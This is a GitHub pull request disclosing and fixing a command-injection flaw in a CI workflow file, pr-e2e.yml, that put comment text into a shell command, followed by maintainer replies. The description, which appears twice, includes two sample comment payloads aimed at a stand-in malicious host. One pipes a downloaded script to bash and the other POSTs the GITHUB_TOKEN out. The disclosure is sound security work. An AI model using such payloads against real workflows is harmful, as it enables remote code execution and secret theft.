-
Notifications
You must be signed in to change notification settings - Fork 1.1k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Security Update pr-e2e.yml #4822
Conversation
pr-e2e.yml is vulnerable to RCE via command injection in comment body. Currently, the following block simply appends the comment body to the shell command. Since the comment body is under user's control, a malicious entity could create a comment such that it escapes the command meant to be executed and instead execute arbitrary commands, which could lead to a variety of security issues such as deletion of files and issues, exfiltration of environment variables to leak secrets, supply chain attack etc: - name: Run end to end tests continue-on-error: true id: test env: AWS_RUN_IDENTITY_TESTS: true AZURE_RUN_AAD_POD_IDENTITY_TESTS: true AZURE_RUN_WORKLOAD_IDENTITY_TESTS: true GCP_RUN_IDENTITY_TESTS: true E2E_IMAGE_TAG: ${{ needs.triage.outputs.image_tag }} TEST_CLUSTER_NAME: keda-e2e-cluster-pr run: | MESSAGE="${{ github.event.comment.body }}" A simple example of a malicious payload in the comment body can be: Security"; curl https://malicious-site.com/malicious-script.sh | bash # This would simply close the double quotes and it would curl a malicious script and pipe it to bash for execution. It will comment out rest of the command. Similarly, to exfiltrate environment variables, a sample payload in the comment body can be: Security"; $GITHUB_TOKEN > /tmp/env.txt && curl -X POST -d @/tmp/env.txt https://malicious-site.com/ This would first save the contents of the GITHUB_TOKEN environment variable in a file in the /tmp directory and then using curl send the contents of the file in a POST request to the attacker controlled web server. Signed-off-by: Aashish Malhotra <74505547+aashish-19@users.noreply.github.com>
Thank you for your contribution! 🙏 We will review your PR as soon as possible.
While you are waiting, make sure to:
Learn more about: |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
❤️ ❤️ ❤️ ❤️
This has been in my TODO list for a while :(
Luckily that code can't be executed by arbitrary users because previous steps require that the user is part of an specific org team, but fixing the issue is always better than restricting the attack vector
/skip-e2e |
Signed-off-by: Yoon Park <yoongon.park@gmail.com>
pr-e2e.yml is vulnerable to RCE via command injection in comment body. Currently, the following block simply appends the comment body to the shell command. Since the comment body is under user's control, a malicious entity could create a comment such that it escapes the command meant to be executed and instead execute arbitrary commands, which could lead to a variety of security issues such as deletion of files and issues, exfiltration of environment variables to leak secrets, supply chain attack etc:
A simple example of a malicious payload in the comment body can be:
Security"; curl https://malicious-site.com/malicious-script.sh | bash #
This would simply close the double quotes and it would curl a malicious script and pipe it to bash for execution. It will comment out rest of the command.
Similarly, to exfiltrate environment variables, a sample payload in the comment body can be:
Security"; $GITHUB_TOKEN > /tmp/env.txt && curl -X POST -d @/tmp/env.txt https://malicious-site.com/
This would first save the contents of the GITHUB_TOKEN environment variable in a file in the /tmp directory and then using curl send the contents of the file in a POST request to the attacker controlled web server.
Fixes GHSA-w92x-gx4w-j5f2
RCE via command injection in pr-e2e.yml
References
For more information about this vulnerability, please refer to the following resources:
Exploiting GitHub Actions on Open Source Projects
Vulnerabilities in CI/CD Pipelines of Popular Open-Source Projects
Vulnerable GitHub Actions Workflows